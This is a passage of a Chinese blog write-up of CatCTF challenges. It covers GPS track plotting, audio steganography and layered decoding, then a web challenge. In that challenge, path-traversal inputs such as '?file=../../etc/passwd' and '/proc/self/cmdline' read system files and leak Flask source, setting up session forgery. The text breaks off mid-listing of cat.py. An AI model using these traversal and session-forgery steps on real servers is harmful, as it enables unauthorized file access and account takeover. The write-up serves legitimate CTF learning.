<!DOCTYPE html>
<html lang="en">
    <head>
  <!-- 元数据 -->
  <meta charset="utf-8">
  
  
  <title>CatCTF | ripple</title>
  <meta name="author" content="rippleQAQ" />
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="robots" content="index,follow" />
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <meta name="format-detection" content="telphone=no, email=no" />
  
    <meta name="keywords" content="" />
  
  <meta name="description" content="一个为猫猫打猫粮的公益CTF，记录一下收获。 现题目已在攻防世界上线： CatCTF原题 官网WP 一、Misc1.CatchCat第一次做GPS题，上网查了资料写脚本做出来了，很有成就感。 附件是GPS数据文件CatchCat.txt，里面有很多GPS数据： 格式都是： $GPGGA,090000.00,3416.48590278,N,10856.86623887,E,1,05,2.87,160">
<meta property="og:type" content="article">
<meta property="og:title" content="CatCTF">
<meta property="og:url" content="https://rippleqaq.github.io/2023/01/04/CatCTF/index.html">
<meta property="og:site_name" content="ripple">
<meta property="og:description" content="一个为猫猫打猫粮的公益CTF，记录一下收获。 现题目已在攻防世界上线： CatCTF原题 官网WP 一、Misc1.CatchCat第一次做GPS题，上网查了资料写脚本做出来了，很有成就感。 附件是GPS数据文件CatchCat.txt，里面有很多GPS数据： 格式都是： $GPGGA,090000.00,3416.48590278,N,10856.86623887,E,1,05,2.87,160">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://rippleqaq.github.io/static/CatCTF/GPS.png">
<meta property="og:image" content="https://rippleqaq.github.io/static/CatCTF/password.png">
<meta property="og:image" content="https://rippleqaq.github.io/static/CatCTF/rabbit.png">
<meta property="og:image" content="https://rippleqaq.github.io/static/CatCTF/base91.png">
<meta property="og:image" content="https://rippleqaq.github.io/static/CatCTF/file.png">
<meta property="og:image" content="https://rippleqaq.github.io/static/CatCTF/passwd.png">
<meta property="og:image" content="https://rippleqaq.github.io/static/CatCTF/findapp.png">
<meta property="og:image" content="https://rippleqaq.github.io/static/CatCTF/app.png">
<meta property="og:image" content="https://rippleqaq.github.io/static/CatCTF/se.png">
<meta property="og:image" content="https://rippleqaq.github.io/static/CatCTF/output.png">
<meta property="article:published_time" content="2023-01-03T16:00:00.000Z">
<meta property="article:modified_time" content="2023-08-02T05:10:15.753Z">
<meta property="article:author" content="rippleQAQ">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://rippleqaq.github.io/static/CatCTF/GPS.png">
  
  <!-- 站点验证相关 -->
  
    
    
    
  
  <!-- 样式表文件 -->
  <link rel="stylesheet" id="kratos-css" href="/css/kratosr.min.css" media="all"></script>
  
    <link rel="stylesheet" id="darkmode-css" href="/css/kr-color-dark.min.css" media="(prefers-color-scheme: dark)"></script>
    <script src="/js/kr-dark.min.js"></script>
  
  
    <link rel="stylesheet" id="highlight-css" href="/css/highlight/night-eighties.min.css" media="all"></script>
  
  
  <link rel="stylesheet" id="fontawe-css" href="/vendors/font-awesome@4.7.0/css/font-awesome.min.css" media="all"></script>
  <link rel="stylesheet" id="nprogress-css" href="/vendors/nprogress@0.2.0/nprogress.css" media="all"></script>
  
  
    <link rel="stylesheet" href="/vendors/aplayer@1.10.1/dist/APlayer.min.css"></script>
  
  
    <link rel="stylesheet" href="/vendors/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css"></script>
  
  <!-- 不得不预先加载的一些JS文件 -->
  <script src="/vendors/jquery@3.6.0/dist/jquery.min.js"></script>
  
    <script src="/vendors/qrcode_js@1.0.0/qrcode.min.js"></script>
  
  
  <style>
    
      .kratos-cover.kratos-cover-2 {
        background-image: url('/images/banner.webp');
      }
    
    
      @media(min-width:768px) {
        body.custom-background {
          background-image: url('/images/bg.webp');
        }
      }
    
  </style>
  
<meta name="generator" content="Hexo 5.4.2"></head>


    <body class="custom-background">
        <div id="kratos-wrapper">
    <div id="kratos-page">
        <div id="kratos-header">
            <header id="kratos-desktop-topnav" class="kratos-topnav">
                <div class="container">
                    <div class="nav-header">
                        <nav id="kratos-menu-wrap">
                            <ul id="kratos-primary-menu" class="sf-menu">
                                
                                    
                                    
                                        
                                            <li><a href="/"><i class="fa fa-home"></i>首页</a></li>
                                        
                                    
                                        
                                            <li><a href="/archives/"><i class="fa fa-file"></i>档案馆</a></li>
                                        
                                    
                                        
                                            <li><a href="/friends/"><i class="fa fa-paw"></i>好伙伴</a></li>
                                        
                                    
                                
                            </ul>
                        </nav>
                    </div>
                </div>
            </header>
            <header id="kratos-mobile-topnav" class="kratos-topnav">
                <div class="container">
                    <div class="color-logo"><a href="/">ripple</a></div>
                    <div class="nav-toggle">
                        <a class="kratos-nav-toggle js-kratos-nav-toggle">
                            <i></i>
                        </a>
                    </div>
                </div>
            </header>
        </div>
        <div class="kratos-start kratos-hero-2">
            <!-- <div class="kratos-overlay"></div> -->
            <div class="kratos-cover kratos-cover-2 text-center">
                <div class="desc desc2 animate-box">
                    <a href="/">
                        <h2>ripple</h2> <br />
                        <span></span>
                    </a>
                </div>
            </div>
        </div>

        <div id="kratos-blog-post">
            <div class="container">
                <div id="main" class="row">
                    

        

            <section class="col-md-8">

        

            <article itemscope itemtype="https://schema.org/Article">
    
    <link itemprop="mainEntityOfPage" href="https://rippleqaq.github.io/2023/01/04/CatCTF/">
    <div class="kratos-hentry kratos-post-inner clearfix">
        <header class="kratos-entry-header">
            
                <h1 class="kratos-entry-title text-center" itemprop="name headline">CatCTF</h1>
            
            
            <ul class="kratos-post-meta text-center">
                <li><time datetime="2023-01-03T16:00:00.000Z" itemprop="datePublished"><i class="fa fa-calendar"></i> 2023-01-04</time></li>
                <li itemprop="author" itemscope itemtype="https://schema.org/Person">
                    <i class="fa fa-user"></i> 作者 <span itemprop="name">rippleQAQ</span>
                </li>
                <li>
                    <i class="fa fa-edit"></i> 
                    
                    
                        ~14.74K
                    
                    字
                </li>
                
            </ul>
        </header>
        <div class="kratos-post-content">
            
            <div id="expire-alert" class="alert alert-warning hidden" role="alert">
                <div class="icon"><i class="fa fa-warning"></i></div>
                <div class="text"><p>本文最后编辑于 <time datetime="1690953015753"></time> 前，其中的内容可能需要更新。</p></div>
            </div>
            
            
            
                <div class="kratos-post-inner-toc toc-div-class" >
                    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E3%80%81Misc"><span class="toc-number">1.</span> <span class="toc-text">一、Misc</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-CatchCat"><span class="toc-number">1.1.</span> <span class="toc-text">1.CatchCat</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-Miao"><span class="toc-number">1.2.</span> <span class="toc-text">2.Miao</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-catcat"><span class="toc-number">1.3.</span> <span class="toc-text">3.catcat</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C%E3%80%81Web"><span class="toc-number">2.</span> <span class="toc-text">二、Web</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-catcat"><span class="toc-number">2.1.</span> <span class="toc-text">1.catcat</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E9%83%A8%E5%88%86"><span class="toc-number">2.1.1.</span> <span class="toc-text">文件读取部分</span></a></li><li class="toc-item toc-level-4"><a class="toc-link"><span class="toc-number">2.1.2.</span> <span class="toc-text"></span></a></li></ol></li></ol></li></ol>
                </div>
            
            <hr />
            <div itemprop="articleBody"><p>一个为猫猫打猫粮的公益CTF，记录一下收获。</p>
<p>现题目已在攻防世界上线：</p>
<p><a target="_blank" rel="noopener" href="https://adworld.xctf.org.cn/challenges/problem-set-index?id=30">CatCTF原题</a></p>
<p><a target="_blank" rel="noopener" href="https://www.wolai.com/nepnep/4njXHjpSLx3uPHR2fc6XL7">官网WP</a></p>
<h2 id="一、Misc"><a href="#一、Misc" class="headerlink" title="一、Misc"></a>一、Misc</h2><h3 id="1-CatchCat"><a href="#1-CatchCat" class="headerlink" title="1.CatchCat"></a>1.<strong>CatchCat</strong></h3><p>第一次做GPS题，上网查了资料写脚本做出来了，很有成就感。</p>
<p>附件是GPS数据文件CatchCat.txt，里面有很多GPS数据：</p>
<p>格式都是：</p>
<p>$GPGGA,090000.00,3416.48590278,N,10856.86623887,E,1,05,2.87,160.00,M,-21.3213,M,,*7E</p>
<p>网上的解释：<a target="_blank" rel="noopener" href="https://www.lehoon.cn/orther/2017/04/25/gnss-gpgga-formet.html">GPGGA格式详解</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">该数据帧的结构及各字段释义如下：</span><br><span class="line">$GPGGA,&lt;1&gt;,&lt;2&gt;,&lt;3&gt;,&lt;4&gt;,&lt;5&gt;,&lt;6&gt;,&lt;7&gt;,&lt;8&gt;,&lt;9&gt;,M,&lt;10&gt;,M,&lt;11&gt;,&lt;12&gt;*xx&lt;CR&gt;&lt;LF&gt;</span><br><span class="line">$GPGGA：起始引导符及语句格式说明(本句为GPS定位数据)；</span><br><span class="line">&lt;1&gt; UTC时间，格式为hhmmss.sss；</span><br><span class="line">&lt;2&gt; 纬度，格式为ddmm.mmmm(第一位是零也将传送)；</span><br><span class="line">&lt;3&gt; 纬度半球，N或S(北纬或南纬)</span><br><span class="line">&lt;4&gt; 经度，格式为dddmm.mmmm(第一位零也将传送)；</span><br><span class="line">&lt;5&gt; 经度半球，E或W(东经或西经)</span><br><span class="line">&lt;6&gt; GPS状态， 0初始化， 1单点定位， 2码差分， 3无效PPS， 4固定解， 5浮点解， 6正在估算 7，人工输入固定值， 8模拟模式， 9WAAS差分</span><br><span class="line">&lt;7&gt; 使用卫星数量，从00到12(第一个零也将传送)</span><br><span class="line">&lt;8&gt; HDOP-水平精度因子，0.5到99.9，一般认为HDOP越小，质量越好。</span><br><span class="line">&lt;9&gt; 椭球高，-9999.9到9999.9米</span><br><span class="line">M 指单位米</span><br><span class="line">&lt;10&gt; 大地水准面高度异常差值，-9999.9到9999.9米</span><br><span class="line">M 指单位米</span><br><span class="line">&lt;11&gt; 差分GPS数据期限(RTCM SC-104)，最后设立RTCM传送的秒数量，如不是差分定位则为空</span><br><span class="line">&lt;12&gt; 差分参考基站标号，从0000到1023(首位0也将传送)。</span><br><span class="line">* 语句结束标志符</span><br><span class="line">xx 从$开始到*之间的所有ASCII码的异或校验</span><br><span class="line">&lt;CR&gt; 回车符，结束标记</span><br><span class="line">&lt;LF&gt; 换行符，结束标记</span><br></pre></td></tr></table></figure>

<p>但这题只用经纬就行。</p>
<p>上网知道了一个好用的py库叫pynmea2，可以提取其中的经纬度信息，然后查到了可以用</p>
<p><a target="_blank" rel="noopener" href="https://lbs.amap.com/demo/javascript-api/example/marker/replaying-historical-running-data">https://lbs.amap.com/demo/javascript-api/example/marker/replaying-historical-running-data</a></p>
<p>来回放点的轨迹。</p>
<p>写了一个Python脚本如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pynmea2</span><br><span class="line">filename = <span class="string">&#x27;CatchCat.txt&#x27;</span></span><br><span class="line"><span class="built_in">list</span> = []</span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(filename) <span class="keyword">as</span> file_object:</span><br><span class="line">  <span class="keyword">for</span> line <span class="keyword">in</span> file_object:</span><br><span class="line">     list1= []</span><br><span class="line">     msg = pynmea2.parse(line)</span><br><span class="line">     list1.append(msg.longitude)</span><br><span class="line">     list1.append(msg.latitude)</span><br><span class="line">     <span class="built_in">list</span>.append(list1)</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">list</span>)</span><br></pre></td></tr></table></figure>



<p> 将输出结果粘贴到网站右侧放经纬度的地方，得到路线图：</p>
<p><img src="/static/CatCTF/GPS.png" alt="GPS"></p>
<p>虽然有点不清楚，但还是看的出来的，flag是CatCTF{GPS_M1ao}</p>
<h3 id="2-Miao"><a href="#2-Miao" class="headerlink" title="2.Miao"></a>2.Miao</h3><p>下载得到一张图片，binwalk分析不出来，用16进制编译器查看发现有一个wav文件，手动分离。</p>
<p>是猫猫的Miao叫声的一个。</p>
<p>用Audacity打开，查看频谱图得到key:CatCTF</p>
<p>上网查了一下，知道了一款叫DeepSound的隐写工具。</p>
<p>用DeepSound打开，用CatCTF作为密码，得到flag.txt。</p>
<p>flag,txt打开发现是猫叫的密码，上网查了一下，选了一个网站解密</p>
<p><a target="_blank" rel="noopener" href="http://hi.pcmoe.net/roar.html%E3%80%82">http://hi.pcmoe.net/roar.html。</a></p>
<p>得到flag</p>
<p>CatCTF{d0_y0u_Hate_c4t_ba3k1ng_?_M1ao~}</p>
<p><strong>小总结：有找到密码的音频可以考虑DeepSound和SilentEye，这两个工具是可能要输入密码的</strong></p>
<h3 id="3-catcat"><a href="#3-catcat" class="headerlink" title="3.catcat"></a>3.catcat</h3><p>下载后得到一个<strong>猫猫.jpg</strong>和一个<strong>我养了一只叫兔子的91岁的猫猫.txt</strong>，猜测jpg有密钥，txt是flag的加密。</p>
<p>没发现名字的提示，且猫猫.jpg也没找到密钥，以为是用stegsolve。</p>
<p>这里要提一嘴，<strong>jpg不可能是LSB</strong>。要去先了解原理，<strong>不要只会工具不会原理</strong>。</p>
<p>后来才知道是rabbit加密（看txt文件名字的提示），至于密码，是在猫猫.jpg的数据里，用16进制编译器搜索password就行了。</p>
<p><img src="/static/CatCTF/password.png" alt="password"></p>
<p>用<a target="_blank" rel="noopener" href="https://www.sojson.com/encrypt_rabbit.html">网站</a>解密txt文件里的内容:</p>
<p><img src="/static/CatCTF/rabbit.png" alt="rabbit"></p>
<p>得到的是base91编码的数据（txt文件名里也有提示）</p>
<p>再次用<a target="_blank" rel="noopener" href="https://ctf.bugku.com/tool/base91">网站</a>解密：</p>
<p><img src="/static/CatCTF/base91.png" alt="base91"></p>
<p>得到的是Ook的加密，最后用<a target="_blank" rel="noopener" href="https://www.splitbrain.org/services/ook">网站</a>解密，得到flag:</p>
<p>CATCTF{Th1s_V3ry_cute_catcat!!!}</p>
<h2 id="二、Web"><a href="#二、Web" class="headerlink" title="二、Web"></a>二、Web</h2><h3 id="1-catcat"><a href="#1-catcat" class="headerlink" title="1.catcat"></a>1.catcat</h3><p>任意文件读取漏洞。</p>
<p>当时只做到找到源码就不会了，主要原因是不会写脚本。</p>
<p><strong>小总结：要提升锻炼写脚本的能力</strong></p>
<p>重新再战这题！</p>
<p>首先是访问网站随便点一下发现可能存在任意文件读取的漏洞。</p>
<p><img src="/static/CatCTF/file.png"></p>
<p>试着用  ?file=../../etc/passwd读取系统文件成功，说明确实存在任意文件读取的漏洞</p>
<p><img src="/static/CatCTF/passwd.png"></p>
<p>那么我们就可以尝试读取源码了。</p>
<p>官方WP是用了?file=../../proc/self/cmdline先找到了文件名</p>
<p><img src="/static/CatCTF/findapp.png"></p>
<p>用?file=../app.py读取源码</p>
<p>我当时是摸的?file../../app/app.py读取源码</p>
<p><img src="/static/CatCTF/app.png"></p>
<p>上图读出来的源码很乱，但由前面b开头可知这是python中的bytes类型</p>
<p>可以直接使用bytes的decode()方法获取格式化的源码，如下</p>
<p>可以直接使用bytes的decode()方法获取格式化的源码，如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">source = <span class="string">b&#x27;import os\nimport uuid\nfrom flask import Flask, request, session, render_template, Markup\nfrom cat import cat\n\nflag = &quot;&quot;\napp = Flask(\n __name__,\n static_url_path=\&#x27;/\&#x27;, \n static_folder=\&#x27;static\&#x27; \n)\napp.config[\&#x27;SECRET_KEY\&#x27;] = str(uuid.uuid4()).replace(&quot;-&quot;, &quot;&quot;) + &quot;*abcdefgh&quot;\nif os.path.isfile(&quot;/flag&quot;):\n flag = cat(&quot;/flag&quot;)\n os.remove(&quot;/flag&quot;)\n\n@app.route(\&#x27;/\&#x27;, methods=[\&#x27;GET\&#x27;])\ndef index():\n detailtxt = os.listdir(\&#x27;./details/\&#x27;)\n cats_list = []\n for i in detailtxt:\n cats_list.append(i[:i.index(\&#x27;.\&#x27;)])\n \n return render_template(&quot;index.html&quot;, cats_list=cats_list, cat=cat)\n\n\n\n@app.route(\&#x27;/info\&#x27;, methods=[&quot;GET&quot;, \&#x27;POST\&#x27;])\ndef info():\n filename = &quot;./details/&quot; + request.args.get(\&#x27;file\&#x27;, &quot;&quot;)\n start = request.args.get(\&#x27;start\&#x27;, &quot;0&quot;)\n end = request.args.get(\&#x27;end\&#x27;, &quot;0&quot;)\n name = request.args.get(\&#x27;file\&#x27;, &quot;&quot;)[:request.args.get(\&#x27;file\&#x27;, &quot;&quot;).index(\&#x27;.\&#x27;)]\n \n return render_template(&quot;detail.html&quot;, catname=name, info=cat(filename, start, end))\n \n\n\n@app.route(\&#x27;/admin\&#x27;, methods=[&quot;GET&quot;])\ndef admin_can_list_root():\n if session.get(\&#x27;admin\&#x27;) == 1:\n return flag\n else:\n session[\&#x27;admin\&#x27;] = 0\n return &quot;NoNoNo&quot;\n\n\n\nif __name__ == \&#x27;__main__\&#x27;:\n app.run(host=\&#x27;0.0.0.0\&#x27;, debug=False, port=5637)&#x27;</span></span><br><span class="line"><span class="built_in">print</span>(source.decode())</span><br></pre></td></tr></table></figure>



<p>得源码app.py:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> uuid</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, request, session, render_template, Markup</span><br><span class="line"><span class="keyword">from</span> cat <span class="keyword">import</span> cat</span><br><span class="line"></span><br><span class="line">flag = <span class="string">&quot;&quot;</span></span><br><span class="line">app = Flask(</span><br><span class="line"> __name__,</span><br><span class="line"> static_url_path=<span class="string">&#x27;/&#x27;</span>, </span><br><span class="line"> static_folder=<span class="string">&#x27;static&#x27;</span> </span><br><span class="line">)</span><br><span class="line">app.config[<span class="string">&#x27;SECRET_KEY&#x27;</span>] = <span class="built_in">str</span>(uuid.uuid4()).replace(<span class="string">&quot;-&quot;</span>, <span class="string">&quot;&quot;</span>) + <span class="string">&quot;*abcdefgh&quot;</span></span><br><span class="line"><span class="keyword">if</span> os.path.isfile(<span class="string">&quot;/flag&quot;</span>):</span><br><span class="line"> flag = cat(<span class="string">&quot;/flag&quot;</span>)</span><br><span class="line"> os.remove(<span class="string">&quot;/flag&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span>, methods=[<span class="string">&#x27;GET&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line"> detailtxt = os.listdir(<span class="string">&#x27;./details/&#x27;</span>)</span><br><span class="line"> cats_list = []</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> detailtxt:</span><br><span class="line"> cats_list.append(i[:i.index(<span class="string">&#x27;.&#x27;</span>)])</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">&quot;index.html&quot;</span>, cats_list=cats_list, cat=cat)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/info&#x27;</span>, methods=[<span class="string">&quot;GET&quot;</span>, <span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">info</span>():</span><br><span class="line"> filename = <span class="string">&quot;./details/&quot;</span> + request.args.get(<span class="string">&#x27;file&#x27;</span>, <span class="string">&quot;&quot;</span>)</span><br><span class="line"> start = request.args.get(<span class="string">&#x27;start&#x27;</span>, <span class="string">&quot;0&quot;</span>)</span><br><span class="line"> end = request.args.get(<span class="string">&#x27;end&#x27;</span>, <span class="string">&quot;0&quot;</span>)</span><br><span class="line"> name = request.args.get(<span class="string">&#x27;file&#x27;</span>, <span class="string">&quot;&quot;</span>)[:request.args.get(<span class="string">&#x27;file&#x27;</span>, <span class="string">&quot;&quot;</span>).index(<span class="string">&#x27;.&#x27;</span>)]</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">&quot;detail.html&quot;</span>, catname=name, info=cat(filename, start, end))</span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/admin&#x27;</span>, methods=[<span class="string">&quot;GET&quot;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">admin_can_list_root</span>():</span><br><span class="line"> <span class="keyword">if</span> session.get(<span class="string">&#x27;admin&#x27;</span>) == <span class="number">1</span>:</span><br><span class="line"> <span class="keyword">return</span> flag</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> session[<span class="string">&#x27;admin&#x27;</span>] = <span class="number">0</span></span><br><span class="line"> <span class="keyword">return</span> <span class="string">&quot;NoNoNo&quot;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line"> app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>, debug=<span class="literal">False</span>, port=<span class="number">5637</span>)</span><br></pre></td></tr></table></figure>



<p>下面官网WP解释的很清楚，借一下（</p>
<p>首先关注含有flag的部分，以下代码可知程序一启动就读取并删除flag文件</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> os.path.isfile(<span class="string">&quot;/flag&quot;</span>):</span><br><span class="line"> flag = cat(<span class="string">&quot;/flag&quot;</span>)</span><br><span class="line"> os.remove(<span class="string">&quot;/flag&quot;</span>)</span><br></pre></td></tr></table></figure>

<p>关注到admin路由可以获取flag，但是需要完成session伪造</p>
<p>需要伪造内容为<code>&#123;&quot;admin&quot; : 1&#125;</code>的session，则需要获取secret key</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/admin&#x27;</span>, methods=[<span class="string">&quot;GET&quot;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">admin_can_list_root</span>():</span><br><span class="line"> <span class="keyword">if</span> session.get(<span class="string">&#x27;admin&#x27;</span>) == <span class="number">1</span>:</span><br><span class="line">   <span class="keyword">return</span> flag</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line">   session[<span class="string">&#x27;admin&#x27;</span>] = <span class="number">0</span></span><br><span class="line">   <span class="keyword">return</span> <span class="string">&quot;NoNoNo&quot;</span></span><br></pre></td></tr></table></figure>

<p>secret key部分如下，是生成一个uuid然后去除<code>-</code>再拼接<code>*abcdefgh</code>组成的</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">app.config[<span class="string">&#x27;SECRET_KEY&#x27;</span>] = <span class="built_in">str</span>(uuid.uuid4()).replace(<span class="string">&quot;-&quot;</span>, <span class="string">&quot;&quot;</span>) + <span class="string">&quot;*abcdefgh&quot;</span></span><br></pre></td></tr></table></figure>

<h4 id="文件读取部分"><a href="#文件读取部分" class="headerlink" title="文件读取部分"></a>文件读取部分</h4><p>可以看到任意文件读取功能是info路由提供的，</p>
<p>注意到可控参数有三个，分别是file，start和end</p>
<p>还注意到其中有个cat函数</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/info&#x27;</span>, methods=[<span class="string">&quot;GET&quot;</span>, <span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">info</span>():</span><br><span class="line"> filename = <span class="string">&quot;./details/&quot;</span> + request.args.get(<span class="string">&#x27;file&#x27;</span>, <span class="string">&quot;&quot;</span>)</span><br><span class="line"> start = request.args.get(<span class="string">&#x27;start&#x27;</span>, <span class="string">&quot;0&quot;</span>)</span><br><span class="line"> end = request.args.get(<span class="string">&#x27;end&#x27;</span>, <span class="string">&quot;0&quot;</span>)</span><br><span class="line"> name = request.args.get(<span class="string">&#x27;file&#x27;</span>, <span class="string">&quot;&quot;</span>)[:request.args.get(<span class="string">&#x27;file&#x27;</span>, <span class="string">&quot;&quot;</span>).index(<span class="string">&#x27;.&#x27;</span>)]</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">&quot;detail.html&quot;</span>, catname=name, info=cat(filename, start, end))</span><br></pre></td></tr></table></figure>

<p>分析源码可知cat函数由cat.py提供</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> cat <span class="keyword">import</span> cat</span><br></pre></td></tr></table></figure>

<p>）</p>
<p>同理去访问?file=../cat.py再进行decode()得到cat.py源码。</p>
<p>cat.py:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os, sys, getopt</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">cat</span>(<span class="params">filename, start=<span class="number">0</span>, end=<span class="number">0</span></span>)-&gt;<span class="built_in">bytes</span>:</span><br><span class="line"> data = <span class="string">b&#x27;&#x27;</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> start = <span class="built_in">int</span>(start)</span><br><span class="line"> end = <span class="built_in">int</span>(end)</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">except</span>:</span><br><span class="line"> start=<span class="number">0</span></span><br><span class="line"> end=<span class="number">0</span></span><br><span class="line"> </span><br><span 